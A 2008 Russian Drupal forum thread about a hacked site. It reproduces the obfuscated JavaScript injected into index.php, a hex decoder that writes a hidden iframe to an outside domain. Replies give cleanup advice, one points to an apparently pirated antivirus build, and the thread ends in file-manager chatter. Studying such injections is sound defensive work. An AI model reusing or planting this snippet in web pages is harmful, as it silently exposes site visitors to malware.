12 марта 2008 в 17:47
Открываю сайт, а там надпись -
Parse error: syntax error, unexpected '<' in /home/uchikz/public_html/index.php on line 41
Посмотрела на Друпал.орг, в обычных случаях рекомендуют заменить индекс.пхп, но у меня замена вызвала новую ошибку, Parse error: syntax error, unexpected '<' in /home/uchikz/public_html/database.inc в какой-то там строчке. Стала искать дальше, нашла такую тему на их форуме Is someone hacking my index.php file???? http://drupal.org/node/229750#comment-766569
Перепроверила - действительно, дописаны какие-то скрипты, что в индекс.пхп, что в датабейз.инк, заменила оба, все встало на место. Но немного страшно - это действительно атака какая-то???
Комментарии
что было дописано? Напишите пожалуйста.
Это делают "вражеские" программы, которые предварительно воруют ваши коды доступа к ftp-сайту.
Можно предположить, что скорее всего вы пользуетесь totalcommander'ом ( или wincommander ), потому, что многие для удобства сохраняют там и логин и пароль...
Обычно "корректируются" файлы index и близкие по названию и функции в корневой директории и на 1-ом уровне директориев.
Пароль желательно программам на хранение не доверять!
У Вас троян, он дописывает какие-то скрипты к индексным файлам. Скорее всего подцепили на каком-нибудь сайте. Меняйте все пароли на фтп.
Пользуюсь файлзиллой, но действительно сохранила там пароль... Впредь буду осторожнее!
А написано там было вот это -
function B51FEBA933E968440ABEF53967208F(B85BCCBE9A04A0ED97B0){function DFE3FA6EDA23EA94F58DBFC3484DC5(){return 16;}return(parseInt(B85BCCBE9A04A0ED97B0,DFE3FA6EDA23EA94F58DBFC3484DC5()));}function E33D7F05D619E5220335E(A45E1C16BDA4E99D74DF6D){var BE7AD0CB540BA52E58DE113C="";for(FC26DFB14765BC8332=0;FC26DFB14765BC8332<A45E1C16BDA4E99D74DF6D.length;FC26DFB14765BC8332+=2){BE7AD0CB540BA52E58DE113C+=(String.fromCharCode(B51FEBA933E968440ABEF53967208F(A45E1C16BDA4E99D74DF6D.substr(FC26DFB14765BC8332,2))));}document.write(BE7AD0CB540BA52E58DE113C);}E33D7F05D619E5220335E("3C696672616D65207372633D687474703A2F2F746865746578746465736B2E636F6D2F2077696474683D31206865696768743D31207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E");
</script>
Поскольку сталкиваюсь с таким впервые, новый вопрос - что теперь делать? Т.е. внешних признаков нет, файлы заменены, сейчас уберу пароль или изменю, - это все?! Или нужно что-то еще проверить? И что делает этот скрипт?
Как что делать?? Очистить комп от троя
Обязательно сменить пароль на FTP!
Проверить все файлы index.* на всех сайтах к которым был возможен доступ с этим паролем.
Чистить комп.
Вирь добывает пароли из распространенных программ вроде Total Commander и прочих, затем в фоновом режиме ходит туда и дописывает себя. Также велик шанс, что ваш пароль куда-то отсылается.
Переписываются также index.html, в них искать вставку около открывающего тега body
После сеанса FTP, я всегда меняю пароли от FTP. Потому что они передаются через сеть в открытом виде. Захожу в панель управления сайта, через https и меняю пароль. А через https, пароли не увидишь.
А если все время подключаться через SSH?
Не у всех есть SSH
Geldora, скрипт делает плохие вещи, пробовать запускать его категорически не рекомендуется
этот скрипт декодирует свою собственную строку
3C696672616D65207372633D687474703A2F2F746865746578746465736B2E636F6D2F2077696474683D31206865696768743D31207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E
и переводит ее в команды яваскрипт и тут-же исполняет, скорее всего он ворует кукисы или что то в этом духе, я не стал докапываться.
Аааа.... ОК, спасибо!!!
Ставьте Linux и забудьте про вирусы.
Установил Панду (Panda) - почистила аналогичные. Рекомендую.
Panda.Internet.Security.2008.v12.0.MultiLanguage.for.WinXP.Vista.Incl
(искать ссылки на nnm.ru)
> Ставьте Linux и забудьте про вирусы.
это точно - не представляю как можно виндовсам доверять свои пароли.
да, и вместо FTP надо пользоваться SFTP - он в krusader-е есть - это такая штука которая работает по защищенному ssh каналу, но с виду от FTP ничем не отличается.
На днях першёл на Linux, занимаюсь освоением.
Первые впечатления оптимстичные, хотя после 10-ти лет Винды всё непривычно.
Я первое время всерьез парился по поводу отсутствия любимого Total Commander. На днях поймал себя на мысли о том, что он мне сейчас в убунте просто не нужен. 90% задач работы с файлами решается через консоль, остальное гномом
А когда переезжал на линукс, для меня отсутствие тотала было серьезным аргументом в пользу того чтобы остаться на винде 
Offtop:
Как же я солидарен по поводу TC! Альтернативы с таким количеством плагинов я не видел... Консоль - пока несколько непривычно. Но, наверное, скоро пообживусь
вместо тотал коммандера в линуксе есть krusader - он умеет гораздо больше - это редактировать в юникоде файлы сразу по фтп, работать с sftp и в нем очень хороший редактор кода с подсветкой - аналога в винде я так и не нашел.
Не хотелось бы устраивать разговор не по делу, но всё же...
TC замечательно редактирует файлы по FTP, последняя версия, если я не ошибаюсь, работает с SFTP, редактор кода с подсветкой - возможно, но лично я пользовался обычно либо без подсветки (akelpad), либо уже специализированными IDE. В от же время, Krusader у меня как-то не приживается. С одной стороны, я не очень активно пробовал, но всё-таки не могу его настроить так, как я хочу: подобие TC-шных плагинов (особенно Lister), внешнее использование... Вместо него замечательно использую Nautilus. Уже даже более-менее привык...
я уже 2 года на линуксе, а из консоли по FTP до сих пор не хожу :). Долго не мог найти удобного клиента.
Недавно открыл для себя расширение для Firefox называется FireFTP. Очень удобно. Не по теме конечно, но может кому-то пригодится.
Подтверждаю, FireFTP - удобная штука.